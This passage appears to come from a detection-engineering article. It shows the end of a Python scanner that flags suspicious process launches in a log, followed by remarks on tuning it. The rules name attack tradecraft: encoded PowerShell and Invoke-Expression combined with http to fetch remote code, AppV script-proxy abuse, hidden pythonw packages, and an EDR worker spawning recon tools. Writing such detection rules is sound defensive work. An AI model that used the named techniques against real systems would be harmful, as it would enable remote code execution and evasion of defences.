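    if image in {"powershell.exe", "pwsh.exe"} and (
        ENCODED_PS.search(cmd)
        or (("iex" in low or "invoke-expression" in low) and "http" in low)
    ):
        hits.append("powershell_encoded_or_remote")
    if image in {"wscript.exe", "cscript.exe"} and "syncappvpublishingserver.vbs" in low and "http" in low:
        hits.append("appv_script_proxy")
    if image == "pythonw.exe" and "__init__.py" in low:
        hits.append("hidden_python_package")
    if parent == "sentinelagentworker.exe" and image in {"reg.exe", "findstr.exe"}:
        hits.append("edr_host_spawning_recon")
    return hits


def scan(log_text):
    """Map each rule name to the 1-based line numbers of the records that triggered it."""
    alerts = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        for rule in evaluate(json.loads(line)):
            alerts.setdefault(rule, []).append(n)
    return alerts


if __name__ == "__main__":
    for rule, lines in sorted(scan(SAMPLE_LOG).items()):
        print(f"{rule:32s} lines {lines}")
```

The rules are intentionally narrow: a plain `powershell -Command` from an administrator or a browser launched from explorer.exe produces no alert, while the combinations the reporting above describes each do. In production the same predicates would run over Sysmon Event ID 1 or EDR telemetry rather than a constructed file, and the EDR-worker rule should be paired with the image-load check ReliaQuest recommends (a signed process loading an unsigned DLL from a non-standard path).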